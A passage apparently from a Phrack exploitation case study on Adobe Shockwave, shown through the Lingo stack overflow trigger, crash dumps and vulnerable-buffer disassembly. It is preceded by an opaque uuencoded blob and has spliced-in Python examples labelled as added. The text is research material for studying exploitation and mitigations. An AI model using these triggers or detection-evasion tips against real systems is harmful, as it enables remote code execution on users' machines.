M_/EC"=8;3NA;TCY8Y!,U1#9\>HQ%DD<P$R,UR,(R2400-M\R8M3C+/6O>ZEM
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
`
end

--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x08 of 0x10

|=-----------------------------------------------------------------------=|
|=---------------=[       The Art of Exploitation       ]=---------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[  Adobe Shockwave  ]=------------------------=|
|=----------------=[ A case study on memory disclosure ]=----------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ aaron portnoy ]=--------------------------=|
|=-------------------=[ deft_phrack at thunkers.net ]=-------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of contents

 1 - Introduction
 2 - Shockwave Overview
  2.1 - Deployment Notes
  2.2 - Supported File Formats
  2.3 - Creating Director Files
  2.4 - Relevant Shockwave Modules
  2.5 - The Lingo Scripting Language
 3 - Vulnerability Discovery
  3.2 - Stack-based Buffer Overflow
  3.3 - Stack-based Memory Disclosure
   3.3.1 - Undocumented Format Specifier
 4 - Exploit Delivery
  4.1 - Server-side Architecture
   4.1.1 - web.py
   4.1.2 - lighttpd
  4.2 - The HTML
  4.3 - The Javascript
  4.4 - The Lingo
  4.5 - The Python
 5 - Vulnerability Exploitation
  5.1 - Windows XP SP3 / Firefox / Shockwave 11.6.5.635
  5.2 - Windows XP SP3 / Firefox / Shockwave 11.6.8.638
  5.3 - Windows 7 x64  / Firefox / Shockwave 12.0.0.112
  5.4 - Windows 7 x64  / Firefox / Shockwave 12.0.0.112 / EMET 5.0
   5.4.1 - Relevant 'EMET 5.0' Mitigations
  5.5 - Windows 8 x64  / Firefox / Shockwave 12.0.0.112 / EMET 5.0
   5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations
 6 - Future Work
 7 - Conclusion
 8 - Greets
 9 - References
 10 - Exploit


--[ 1 - Introduction

These days, proper exploit development on the latest and greatest operating
systems is a time-consuming task. It doesn't help matters that the
availability of public resources to help individuals research techniques to
achieve such ends is becoming scarce. There are many reasons why this is
now the case. Mainly, techniques to bypass security mitigations have become
a valuable commodity to various entities and as such are no longer released
as often for public dissemination or to further one's reputation.

I was lucky enough to get started in this field when there were resources
like Gera's insecure programming challenges [1], 29A [2], Uninformed [3],
and of course Phrack to inspire me. I've tried to imagine what it would be
like to be a newcomer in current times and it's a bit depressing that most
(not all) of the material that is actually published is done so with an
unhealthy bit of rodomontade and ulterior motives. Generally, the output
lacks details that are most facilitating to an aspiring researcher--the
approaches to the problem (including the failures) that so define how a
so-called hacker really thinks.

This article is intended to give the reader insight into an approach to the
vulnerability discovery and exploitation process. By no means should the
take-away from this be that mitigations are broken or easily defeated, but
rather it serves as a case study demonstrating real-world vulnerabilities
and the process by which I was able to achieve successful code execution in
spite of various mitigations that have hitherto not been bypassed publicly.

What follows is a walkthrough of the discovery and exploitation of a
memory disclosure vulnerability and a stack-based buffer overflow that
together can be abused to bypass stack cookies (/GS), SafeSEH (/SAFESEH),
full process Address Space Layout Randomization (ASLR, /DYNAMICBASE), Data
Execution Prevention (DEP), Structured Exception Handler Overwrite
Protection (SEHOP), and the Enhanced Mitigation Experience Toolkit (EMET)
to gain reliable code execution against a multitude of platforms, but with
a focus on Windows 8 x64.

The bugs discussed herein were discovered by myself and where applicable I
will try to cite dates to help the reader understand the time invested to
create the end result. Hopefully there's something in here that you're able
to take away and I'd like to imagine one day you'll also share something
with those who come after you.


--[ 2 - Shockwave Overview

The vulnerabilities I'll be discussing are in Adobe's Shockwave Player [4],
a closed-source application used for viewing Adobe Director media files
within a browser. The player can be installed on Windows and Mac OS
operating systems and is deployed on over 450 million desktops according to
Adobe [5].

Shockwave is often confused with Flash due to Flash's misleading MIME type
of 'application/x-shockwave-flash'. This is not the case, however, and the
technologies are entirely independent of each other (for the record,
Shockwave's MIME type is 'application/x-director').


----[ 2.1 - Deployment Notes

The Shockwave Player is invoked differently depending on which browser/OS
you're running. For example, in the case of Internet Explorer the Shockwave
ActiveX control is instantiated and the Adobe modules are loaded into the
iexplore.exe process space. However, in the case of Firefox, plugins are
loaded via NPAPI [6] and occupy a new child process called
plugin-container.exe.

By default, if a user visits the Shockwave installer site, they are served
up the "slim" version of the installer. The difference between the slim and
the full is that the slim does not contain all the functionality for
various media types (instead they are downloaded when the Player tries to
render a media file with such content).

It should also be noted that the code is distributed as a 32-bit build,
even if deployed on a 64-bit operating system.


----[ 2.2 - Supported File Formats

Shockwave is used to render Adobe Director files. These come in three
forms:

	- .dir is an uncompressed Director file
	- .dcr is a Director file compressed in various locations using zlib
	- .dxr is a non-editable Director file

Each of these is undocumented but is based on the RIFF file format
(except that their data is stored in big endian as denoted by the file
magic value of 'RIFX').

For example, a partial hex dump of a .dir file:


Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
---------------------------------------------------------------------------
00000000  58 46 49 52 78 62 05 00 33 39 56 4D 70 61 6D 69  XFIRxb..39VMpami
00000010  18 00 00 00 01 00 00 00 26 8B 00 00 82 07 00 00  ........&`..`...
00000020  00 00 00 00 00 00 00 00 00 00 00 00 2A 59 45 4B  ............*YEK
00000030  74 01 00 00 0C 00 0C 00 1E 00 00 00 17 00 00 00  t...............
00000040  3E 00 00 00 04 00 00 00 6D 75 68 54 0D 00 00 00  >.......muhT....
00000050  04 00 00 00 44 45 4D 58 2B 00 00 00 4B 00 00 00  ....DEMX+...K...
00000060  6D 75 68 54 6D 00 00 00 4B 00 00 00 44 45 4D 58  muhTm...K...DEMX
...


The .DCR format is useful for bypassing network detection, as no
device/software I am aware of currently knows how to decompress this
proprietary format.
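
For triage of files like the one dumped above, the fixed header is enough
to identify a Director container whatever its extension. The following is
an added example, not code from the article or from Adobe; the names
parse_container, Chunk and fourcc are hypothetical, and the sequential
chunk walk assumes the generic RIFF layout.

```python
import struct
from typing import NamedTuple

# Constructed sample: the first 0x40 bytes of the .dir hex dump shown above.
SAMPLE = bytes.fromhex(
    "58 46 49 52 78 62 05 00 33 39 56 4D 70 61 6D 69 "
    "18 00 00 00 01 00 00 00 26 8B 00 00 82 07 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 2A 59 45 4B "
    "74 01 00 00 0C 00 0C 00 1E 00 00 00 17 00 00 00 "
)

# 'RIFX' is the magic the article names (big-endian fields); the dump itself
# starts with the byte-swapped 'XFIR', whose fields decode as little-endian.
BYTE_ORDER = {b"RIFX": ">", b"XFIR": "<"}


class Chunk(NamedTuple):
    tag: str         # FourCC in reading order, e.g. 'imap'
    offset: int      # file offset of the chunk header
    length: int      # declared payload length
    truncated: bool  # payload extends past the bytes available


def fourcc(raw: bytes, order: str) -> str:
    """Return a FourCC in reading order ('pami' on disk becomes 'imap')."""
    return (raw[::-1] if order == "<" else raw).decode("latin-1")


def parse_container(data: bytes, max_chunks: int = 64) -> dict:
    """Parse the fixed header and walk top-level chunks without trusting lengths."""
    if len(data) < 12:
        raise ValueError("too short for a RIFX header")
    order = BYTE_ORDER.get(bytes(data[:4]))
    if order is None:
        raise ValueError("not a RIFX/XFIR container")
    (declared,) = struct.unpack_from(order + "I", data, 4)
    chunks = []
    pos = 12
    # Assumption: chunks follow the generic RIFF layout (tag, length, payload,
    # pad to an even offset). max_chunks bounds the walk on hostile input.
    while pos + 8 <= len(data) and len(chunks) < max_chunks:
        (length,) = struct.unpack_from(order + "I", data, pos + 4)
        end = pos + 8 + length
        truncated = end > len(data)
        chunks.append(Chunk(fourcc(data[pos:pos + 4], order), pos, length, truncated))
        if truncated:
            break
        pos = end + (length & 1)
    return {
        "byte_order": "little" if order == "<" else "big",
        "declared_size": declared,
        "form_type": fourcc(data[8:12], order),
        # The RIFF length field excludes the 8-byte magic+length prefix.
        "complete": declared + 8 == len(data),
        "chunks": chunks,
    }


if __name__ == "__main__":
    info = parse_container(SAMPLE)
    print(info["byte_order"], hex(info["declared_size"]), info["form_type"])
    for c in info["chunks"]:
        print(f"  {c.tag!r} at {c.offset:#x}, {c.length:#x} bytes, truncated={c.truncated}")
```

A declared size that disagrees with the bytes on hand, or a chunk marked
truncated, is worth flagging before the file reaches a renderer.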


----[ 2.3 - Creating Director Files

Director files are created in, appropriately, Adobe Director [7]. The
interface is very similar to Flash Studio in that there are frames, a movie
object, a stage, cast members, sprites, and script objects.

One quirk worth mentioning is that by default, when 'playing' a file within
Director it uses an older version of the Shockwave libraries (not the ones
in the player's default directory). I'm guessing that this might not be the
case if you're using the latest Director (version 12), but as I was using
warez, well, ... you get it. This can impact your exploit development so
ensure you test outside Director as well (or overwrite the appropriate
modules with newer versions).


----[ 2.4 - Relevant Shockwave Modules

There are two main modules that Shockwave uses to handle parsing and
rendering of DIR files: DIRAPI.dll and IML32.dll. I did a bit of research
on these back in 2011 [8]. Shockwave uses a custom memory manager called
Smartheap [9], but that isn't really of much interest with regard to the
vulnerabilities described in this article.

In addition to those two modules, there are also a number of "Xtras". These
files have .x32 extensions but are simply DLL files. They provide added
functionality for things like embedded media (Quicktime, Flash, 3D objects,
fonts, audio, and so on).


----[ 2.5 - The Lingo Scripting Language

Shockwave files have support for a built-in scripting language called Lingo
which was created in the 1990s and, according to the inventor John
Thompson, was his "...most significant contribution to the computer
industry to date" [10].

Lingo enables a Director developer to interact with multimedia elements and
the user. Its intended functionality is very similar to its Adobe Flash
counterpart, Actionscript. Its syntax, however, is a bit different. There
is an API reference available on Adobe's site [11] that covers mostly
everything you'd need to know about it.

We'll soon see that Lingo can provide an attacker with a wealth of
information to aid in the exploitation process.


--[ 3 - Vulnerability Discovery

I had previously spent a good amount of time bug hunting in Shockwave for a
presentation at CanSecWest and had unearthed a few file format
vulnerabilities. The problem with those, however, is that anybody with the
ability to bit-flip a file can also stumble upon them trivially. So, this
time around I decided to see what I could find in Lingo.

One of the most tedious aspects of bug hunting is figuring out the best way
to generate input to properly cover as much of the attack surface as
possible. My first attempt at this was to don my hipster jeans and learn to
develop Director movies legitimately. I tried to embed as much content as
possible and ensured in a debugger that the appropriate Xtras were being
loaded into the process. The hardest part was learning how to properly
access the objects via Lingo and interact with them in the hopes of causing
a fault.

After exhausting as many Lingo methods as I could manage to invoke (it's a
long list, check out the URL below), I sat back and considered what to do
next.

http://help.adobe.com/en_US/Director/11.5/UsingScripting/WSc3ff6d0ea77859461172e0811d64c1a1b3-7ff4.html

Following reflection upon my prior attempts, I realized that the one subset
of the available Lingo methods that I was unable to invoke were related to
the 3D API. As it turns out, I was unable to call Lingo's 3D methods
because I could not embed a proper 3D object and initialize the environment
as was required.

I decided the best approach was to find an existing Director file that
already had 3D objects and associated Lingo code in it. After searching a
while I found that Director itself comes with some tutorial files that fit
the need. In the

%ProgramFiles%\Adobe\Adobe Director 11\Configuration\Tutorials\3D

folder are the .dir files I was hoping to find. Once they were loaded into
Director I found the Lingo scripts I could simply modify to invoke the
methods I had previously overlooked.


----[ 3.2 - Stack-based Buffer Overflow

The first vulnerability I discovered was a stack-based buffer overflow that
could be reached via two different Lingo methods (they hit the same
vulnerable code, so I consider them the same bug). The vulnerable methods
were:

    - physicsWorld.loadProxyTemplate(string proxyname, 3dmember)
    - world.createRigidBody(string rigidbodyname, string 3Dmodelname,
    symbolBodyProxy, symbol bodyType, symbol flipNormals)

When provided with a large enough string as the first parameter to either
of these, a buffer on the stack can be overflowed.

In order to craft a large string in Lingo, you can use their equivalent of
a for loop:


  buf = ""
  repeat with i = 0 to 10000
    buf = buf & "$"
  end repeat


Depending on how much data is provided, the fault that the debugger catches
may differ. Here's one such crash:


(63c.410): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=02f6bd10 ecx=00000000 edx=03790404 esi=000033a7
edi=02f6c248
eip=6fde9d0a esp=02f6b7ec ebp=02f6b7ec iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00210206
IML32!Ordinal1115+0xa:
6fde9d0a 81780454534146  cmp   dword ptr [eax+4],46415354h ds:002b:3773423a


OK, from the faulting instruction alone there is not much to deduce. The
call stack tells us a bit more:


0:005> kv
ChildEBP RetAddr  Args to Child
02f6b7ec 6f2277b8 37734236 02f6b810 6f2283b1 IML32!Ordinal1115+0xa
02f6b7f8 6f2283b1 02f6c248 06cf7024 00000000 DIRAPI+0x377b8
02f6b810 6f23a8ea 06cf7024 000033a7 02f6bd10 DIRAPI+0x383b1
02f6b82c 6f35ec15 06cf7024 02f6c248 02f6bd10 DIRAPI+0x4a8ea
02f6b848 6e73250b 06ced4bc 02f6c248 02f6bd10 DIRAPI+0x16ec15
02f6c114 42346942 69423569 37694236 42386942 Dynamiks+0x335e
02f6c118 69423569 37694236 42386942 6a423969 0x42346942
02f6c11c 37694236 42386942 6a423969 316a4230 0x69423569
02f6c120 42386942 6a423969 316a4230 42326a42 0x37694236
02f6c124 6a423969 316a4230 42326a42 6a42336a 0x42386942
02f6c128 316a4230 42326a42 6a42336a 356a4234 0x6a423969
02f6c12c 42326a42 6a42336a 356a4234 42366a42 0x316a4230
<snip>


The first thing that jumps out here is that there are what appear to be 5
fully intact frames before the stack is smashed. That tells us that the
destination buffer likely originates in the Dynamiks module.

We can also see that there are two stack pointers passed as arguments from
Dynamiks. Inspecting these we can see which was the destination buffer (we
could also deduce this from the frame pointers we see in the call stack...
i.e. it's unlikely to be 0x02f6c248 because the corruption began lower on
the stack):


0:005> dc 02f6c248 L8
02f6c248  73423573 37734236 42387342 74423973 s5Bs6Bs7Bs8Bs9Bt
02f6c258  31744230 42327442 74423374 35744234 0Bt1Bt2Bt3Bt4Bt5
0:005> dc 02f6bd10 L8
02f6bd10  41306141 61413161 33614132 41346141 Aa0Aa1Aa2Aa3Aa4A <- beginning
02f6bd20  61413561 37614136 41386141 62413961 a5Aa6Aa7Aa8Aa9Ab   of our buf


So, the stack buffer begins at 0x02f6bd10 and was passed from the Dynamiks
module into DIRAPI as argument 3. This can be seen by disassembling the
Dynamiks module and checking out the code before offset 0x335e:


(Dynamiks.x32: md5sum c6a9a75deb3da27682c267a7a2507e16, checksum 2a30eb,
Shockwave version 12.0.0.112)

0:005> ub Dynamiks+0x335e L6
Dynamiks+0x334f:
709e334f 8d8dfcfbffff    lea     ecx,[ebp-404h] <- vulnerable buffer
709e3355 51              push    ecx <------------ passed as third argument
709e3356 8d4f08          lea     ecx,[edi+8]
709e3359 51              push    ecx
709e335a 50              push    eax
709e335b ff5244          call    dword ptr [edx+44h]


In a real disassembler (IDA Pro) we can see how large that local variable
is by checking out the function's stack:


-00000404 var_404         db 1024 dup(?)  <--- vuln buffer, 1024 bytes
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 arg_0           dd ?
+0000000C arg_4           dd ?
+00000010 arg_8           dd ?
+00000014 arg_C           dd ?
+00000018 arg_10          dd ?


Any string over 1024 bytes in size will corrupt var_4. Any guess as to what
var_4 is? Yep... say hello to the /GS mitigation:


(Dynamiks.x32: base address 0x10000000)

.text:100018A8                 mov     eax, ___security_cookie
.text:100018AD                 xor     eax, ebp
.text:100018AF                 mov     [ebp+var_4], eax


For those of you not familiar with /GS [12] it is a compiler option that is
on by default in any recent version of Visual Studio. It works by ... well,
skape said it much better than I in his Uninformed [13] article when
describing stack cookie initialization:

"At a high-level, this routine will take an XOR'd combination of the
current system time, process identifier, thread identifier, tick count, and
performance counter. The end result of XOR'ing these values together is
what ends up being the image file's security cookie."

The result of those operations is a 4-byte value that gets generated when
the module is loaded and then stored in its .data section. Any function the
compiler deems in need of some extra protection takes that value and XORs
it again with the current frame pointer (@ebp). It then stores it on the
stack as the first local variable. Upon function exit, the process checks
if it has been tampered with and, if so, throws an exception which usually
results in process termination.

Had we not caused an exception in IML32.dll the code would still return
back to the Dynamiks module and upon function exit (provided it doesn't
access any other invalid data along the way), the stack cookie check would
fail and the process would throw an exception and probably exit. Either
way, this is an obstacle we'll need to bypass.

We'll get back to this in a bit.
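
The cookie mechanism described above can be modelled on the frame layout
from the IDA stack view. This is an added example, not code from the
article or from Shockwave: the cookie value, saved ebp and return address
are constructed, and unbounded_copy / bounded_copy are hypothetical
stand-ins for the real copy routine and a length-checked replacement.

```python
import struct

BUF_SIZE = 1024          # var_404: db 1024 dup(?)
EBP = 0x02F6C114         # Dynamiks frame pointer from the call stack above
COOKIE = 0x5A17C0DE      # constructed stand-in for ___security_cookie
SLOTS = (("var_4", BUF_SIZE), ("saved ebp", BUF_SIZE + 4),
         ("return address", BUF_SIZE + 8))


class Frame:
    """Bytes from ebp-0x404 up to and including the return address."""

    def __init__(self, ebp=EBP, cookie=COOKIE):
        self.ebp = ebp
        self.mem = bytearray(BUF_SIZE + 12)
        # Prologue: mov eax, ___security_cookie / xor eax, ebp /
        # mov [ebp+var_4], eax. Saved ebp and return address are constructed.
        struct.pack_into("<III", self.mem, BUF_SIZE,
                         cookie ^ ebp, 0x02F6C200, 0x10001234)
        self.pristine = bytes(self.mem)

    def unbounded_copy(self, name: bytes):
        """Copy name plus its NUL terminator with no length check."""
        data = name + b"\x00"
        n = min(len(data), len(self.mem))  # bytes past the return address are not modelled
        self.mem[:n] = data[:n]

    def bounded_copy(self, name: bytes):
        """Hardened form: refuse anything that does not fit in var_404."""
        if len(name) + 1 > BUF_SIZE:
            raise ValueError("name does not fit in the 1024-byte buffer")
        self.mem[:len(name) + 1] = name + b"\x00"

    def clobbered(self):
        """Names of the control slots whose bytes no longer match the prologue state."""
        return [label for label, off in SLOTS
                if self.mem[off:off + 4] != self.pristine[off:off + 4]]

    def cookie_ok(self, cookie=COOKIE):
        """Epilogue check: undo the XOR with ebp and compare with the module cookie."""
        (stored,) = struct.unpack_from("<I", self.mem, BUF_SIZE)
        return (stored ^ self.ebp) == cookie


def call_with(name: bytes, hardened: bool):
    """Run one modelled call and report (outcome, clobbered slots)."""
    frame = Frame()
    try:
        (frame.bounded_copy if hardened else frame.unbounded_copy)(name)
    except ValueError:
        return "rejected", []
    # The check runs only here, when the function is about to return.
    if not frame.cookie_ok():
        return "terminated", frame.clobbered()
    return "returned", frame.clobbered()


if __name__ == "__main__":
    for label, name in (("1023 bytes", b"A" * 1023),
                        ("1024 bytes", b"A" * 1024),
                        ("10001 bytes", b"$" * 10001)):
        print(label, "unchecked:", call_with(name, False),
              "checked:", call_with(name, True))
```

Even the single NUL terminator of a 1024-character name lands in var_4 and
fails the check, which is why the length test belongs before the copy.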


----[ 3.3 - Stack-based Memory Disclosure

In the course of testing the 3D Lingo methods, I was using a string
consisting of a large number of "%x" specifiers. I was lucky enough to
also be outputting objects to the Messages window via Lingo's trace()
